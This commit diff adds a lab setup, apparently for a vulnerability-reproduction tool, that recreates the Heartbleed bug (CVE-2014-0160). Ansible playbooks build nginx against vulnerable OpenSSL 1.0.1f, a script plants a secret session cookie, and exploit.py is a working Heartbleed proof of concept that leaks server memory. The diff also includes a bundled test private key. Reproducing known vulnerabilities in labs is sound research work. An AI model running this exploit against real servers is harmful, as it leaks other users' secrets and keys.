Add CVE-2014-0160

CVE-2014-0160/cvex.yml

@@ -0,0 +1,8 @@
+blueprint: debian7-debian7
+debian1:
+  playbook: debian1.yml
+debian2:
+  playbook: debian2.yml
+  command:
+  - "python /opt/alice.py %debian1%"
+  - "python /opt/exploit.py %debian1%"

CVE-2014-0160/data/alice.py

@@ -0,0 +1,7 @@
+import requests
+import sys
+
+c = {
+    'session': 'ultr@_s3cr3t_c00kie'
+}
+requests.get('https://{}'.format(sys.argv[1]), cookies=c, verify=False)

CVE-2014-0160/data/default.conf

@@ -0,0 +1,22 @@
+worker_processes  1;
+
+events {
+    worker_connections  1024;
+}
+
+http {
+    server {
+        listen 443 default_server ssl;
+
+        server_name localhost;
+
+        ssl on;
+        ssl_certificate /opt/vuln/conf/crt;
+        ssl_certificate_key /opt/vuln/conf/key;
+
+        location / {
+            root   /opt/vuln/html;
+            index  index.html index.htm;
+        }
+    }
+}

CVE-2014-0160/data/exploit.py

@@ -0,0 +1,77 @@
+import binascii
+import socket
+import time
+import sys
+
+CLIENT_HELLO = '''
+16 03 02 00 31 # TLS Header
+01 00 00 2d    # Handshake header
+03 02          # ClientHello field: version number (TLS 1.1)
+50 0b af bb b7
+5a b8 3e f0 ab
+9a e3 f3 9c 63
+15 33 41 37 ac
+fd 6c 18 1a 24
+60 dc 49 67 c2
+fd 96          # ClientHello field: random
+00             # ClientHello field: session id
+00 04          # ClientHello field: cipher suite length
+00 33 c0 11    # ClientHello field: cipher suite(s)
+01             # ClientHello field: compression support, length
+00             # ClientHello field: compression support, no compression (0)
+00 00          # ClientHello field: extension length (0)
+'''
+
+BAD_HB = '''
+18    # Content type = 18 (Heartbeat message)
+03 02 # Version
+00 03 # Packet length
+01    # Heartbeat message type (1 = request)
+FF FF # Payload length
+        # There is no actual message, just an empty string
+'''
+
+def no_comments(p):
+    r = b''
+    next_line = False
+    for line in p.split('\n'):
+        for hexbyte in line.split(' '):
+            if len(hexbyte) == 0 or hexbyte[0] == '#':
+                next_line = True
+                break
+            r += binascii.a2b_hex(hexbyte)
+        if next_line:
+            continue
+    return r
+
+def recvall(s, timeout=3):
+    s.setblocking(0)
+    total_data = []
+    data = ''
+    begin = time.time()
+    while True:
+        if total_data and time.time() - begin > timeout:
+            break
+        elif time.time() - begin > timeout * 2:
+            break
+        try:
+            data = s.recv(8192)
+            if data:
+                total_data.append(data)
+                begin = time.time()
+            else:
+                time.sleep(0.1)
+        except:
+            pass
+    return b''.join(total_data)
+
+def attack(host, port):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+
+    s.send(no_comments(CLIENT_HELLO))
+    recvall(s)
+    s.send(no_comments(BAD_HB))
+    print(recvall(s))
+
+attack(sys.argv[1], 443)

CVE-2014-0160/data/linux.crt

@@ -0,0 +1,20 @@
+-----BEGIN CERTIFICATE-----
+MIIDWTCCAkGgAwIBAgIUdIiC/GFjRlOJnyhtrUhVzWIPK9wwDQYJKoZIhvcNAQEL
+BQAwKzELMAkGA1UEBhMCWFgxDTALBgNVBAgMBDEzMzcxDTALBgNVBAoMBENWRVgw
+HhcNMjQwODA2MTIwNDU4WhcNMjUwODA2MTIwNDU4WjBBMQswCQYDVQQGEwJYWDET
+MBEGA1UECAwKU29tZS1TdGF0ZTENMAsGA1UECgwEQ1ZFWDEOMAwGA1UEAwwFbGlu
+dXgwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCdAtjBOkEoC6N1tH0p
+m6o43S+sdAnB0n3+Oe30lV6w0vPLYoWOHNx0L0l9RM0A9JIxTBLOQsgFT6KDHoZb
+MJBEf0tXyCsCUW41fWllXSDMYtOGTuMg7Kyq31Row1kZ3OW06uuto/9RWzoncZ1V
+C/VyDo5GIrPnO8EhxR31VEBj1lipgD/hz+8k51NNft1Xi+qrL7k3/Gm90Zs7tyx8
+UIPFlZGmwQUbA/1CWd0087LwZz6GOvoDo5JHx4hhsh4ggfVZyU/T9WG041LBvTsg
+5sjSZtra1upM8Ho6O0gfrG7Urp5MxjNydjGDMA9nfp4IfZ3DIv3h0KNQDE8flYCo
+iOVfAgMBAAGjXzBdMB8GA1UdIwQYMBaAFOmOM8zF5KT2LGytpX0uDdeWS74eMAkG
+A1UdEwQCMAAwEAYDVR0RBAkwB4IFbGludXgwHQYDVR0OBBYEFCnux6b10GYelY9t
+m32D4HNR6TfTMA0GCSqGSIb3DQEBCwUAA4IBAQA6vS6ITmsoLRJpgu3chCgLDV4L
+jLJqNHgjWPs4/ZegIfjfkcwh96EW/aN5JQVRq1IZ9maldzfBaUO9+egrGNhAfYie
+eMDoSOYWk6IxtuM9gf3tcu2+bce1NaTRKraUWzvgN5twf06YiEl8Fuxb7s7duMlQ
+3C5FSAzXvB3zItpBKerFF3JgdkOyBzQU6dFltWDKg7O9Pq5p1/Ngo0MlD97Y9MTG
+sVdV50V2qrcZJ6xQs6Mr5pB2RUeUs+f6azYzfNrzz8qTxmwOZiFuUMEq09O6MMrB
+bsQkvjF8rGSfk0H9cHC7hLnNnMygZYPvD1YjvHGepjpmVjTiyv9CYufTYMJ9
+-----END CERTIFICATE-----

CVE-2014-0160/data/linux.key

@@ -0,0 +1,28 @@
+-----BEGIN PRIVATE KEY-----
+MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCdAtjBOkEoC6N1
+tH0pm6o43S+sdAnB0n3+Oe30lV6w0vPLYoWOHNx0L0l9RM0A9JIxTBLOQsgFT6KD
+HoZbMJBEf0tXyCsCUW41fWllXSDMYtOGTuMg7Kyq31Row1kZ3OW06uuto/9RWzon
+cZ1VC/VyDo5GIrPnO8EhxR31VEBj1lipgD/hz+8k51NNft1Xi+qrL7k3/Gm90Zs7
+tyx8UIPFlZGmwQUbA/1CWd0087LwZz6GOvoDo5JHx4hhsh4ggfVZyU/T9WG041LB
+vTsg5sjSZtra1upM8Ho6O0gfrG7Urp5MxjNydjGDMA9nfp4IfZ3DIv3h0KNQDE8f
+lYCoiOVfAgMBAAECggEAEq68MvXRu0hIlCC8rz7uDiPHi0TSxQ+HssCa32UHUOax
+CqziSRWHEoNul6t1nJz9aO9CjOzRAczG1hpDkMXiYhF8L2mf2yqXALdiW0+DBRQ8
+qM5p4/OK3NmDy47JuImagvYHGBtxAxxl+uaKeuGtkXuePfCIKUYTcNy/IqolRUZp
+arBxWThPkuVcB3/xNr+HOvqIoi7acJn1LiOQoSksY13WPT1jizwPShCBpk1IFa1m
+amon6ABst28nn0hrPhUWRjHU/p2Smb1KKXMxiF451uFTsSW3gkX/Jag+xYUqNEhL
+Ib9aDxJO/tABzLPrUF1yi1wTGogEyK+CXhcEN7p0XQKBgQDVYjMI0/nM72oIGy3F
+riSmJhLE0DCxHr9lxy6w6w1RECLun6Mm7feRW8ggn+hg7H0SH2X+aYsKfjVA/IML
+ptfPC3EM27EqYfU59JyUweOaPGB5qsCh+Z3OltWVvCzhHrRMlKVLG82UmhUEroEk
+LTjHyMTe4hSKEDPrcFfmLVd5swKBgQC8XnSiknUP1bLnma7PXLxuJVxkPn4qegRS
+/IsbCLm01UXZpV80Ab09L/8O/imXey4hWwiI1Et9NHV4Y1EZCQ74Ru7cQIIcs3F0
+8TdKfm0QB8ki3qjcZF223Ef6irgZKVNJWiiE5hse/nGjmi3b2bNytM/KP9mJAwmr
+FSpHhvY3pQKBgHJiSI8z6lVUBZfA0gGEvzqdcDQ2kdNwcxMg+cN2zNWme8NEqdXF
+fI9cDuSGM7A5NTZQxIDjnNgMHYnvkmPdlRP0wy4sWkUo66acnI8VfGeCdAjkYoyx
+XUmQC4BPthMbPXVLvWuMxOAi1J+E189HuodF9VqxAGeeFebgew31Qk4HAoGAAJ12
+WAmOZEzYVrVDwt2Up+9rS9CAbPcVCIhWk/IFWTfREJLfqrXOvmJnvM7Lp/j4/5bi
+gj/fNztynsAERcany9u/b+yuABX96tnWymF7TbAY0gpUFtQlEjHJ8mF9lGd0JCst
+MrHlqMY/7L7WI3+kfF1myExJE490+qAJEU65gxkCgYAOaIER8qZBHQJfrUxT3W5K
+JKXtbC10FxfIteCyVfaEbFUa1xk3d1JfEgkJiWXTm61V2c0czizlquudeIF5/ctL
+t5J0OCH/m+omi9gDvuNSi/BnV2Lqd8L4sNpJPk3YwAMfBAYoFtnVJQT51ipeXLQQ
+EGm611s7ugq1fLFe0DzpXA==
+-----END PRIVATE KEY-----

CVE-2014-0160/debian1.yml

@@ -0,0 +1,44 @@
+- name: Nginx server
+  hosts: all
+  become: true
+  tasks:
+    - name: Copy openssl
+      ansible.builtin.copy:
+        src: ./data/openssl-1.0.1f.tar.gz
+        dest: /opt/openssl-1.0.1f.tar.gz
+        checksum: 9ef09e97dfc9f14ac2c042f3b7e301098794fc0f
+    - name: Copy nginx
+      ansible.builtin.copy:
+        src: ./data/nginx-1.6.0.tar.gz
+        dest: /opt/nginx-1.6.0.tar.gz
+        checksum: 00eed38652d2cee36cc91a395f6703584658bb23
+    - name: Unpack openssl
+      ansible.builtin.unarchive:
+        src: /opt/openssl-1.0.1f.tar.gz
+        remote_src: true
+        dest: /opt/
+    - name: Unpack nginx
+      ansible.builtin.unarchive:
+        src: /opt/nginx-1.6.0.tar.gz
+        remote_src: true
+        dest: /opt/
+    - name: Build nginx
+      ansible.builtin.shell: |
+        cd /opt/nginx-1.6.0
+        ./configure --prefix=/opt/vuln --with-openssl=../openssl-1.0.1f --with-http_ssl_module --without-http_rewrite_module
+        make
+        make install
+    - name: Copy default.conf
+      ansible.builtin.copy:
+        src: ./data/default.conf
+        dest: /opt/vuln/conf/nginx.conf
+    - name: Copy certificate
+      ansible.builtin.copy:
+        src: ./data/linux.crt
+        dest: /opt/vuln/conf/crt
+    - name: Copy key
+      ansible.builtin.copy:
+        src: ./data/linux.key
+        dest: /opt/vuln/conf/key
+    - name: Start nginx
+      ansible.builtin.shell: /opt/vuln/sbin/nginx

CVE-2014-0160/debian2.yml

@@ -0,0 +1,12 @@
+- name: Populate data to be exfiltrated and execute vulnerability
+  hosts: all
+  become: true
+  tasks:
+    - name: Copy alice
+      ansible.builtin.copy:
+        src: ./data/alice.py
+        dest: /opt/alice.py
+    - name: Copy exploit
+      ansible.builtin.copy:
+        src: ./data/exploit.py
+        dest: /opt/exploit.py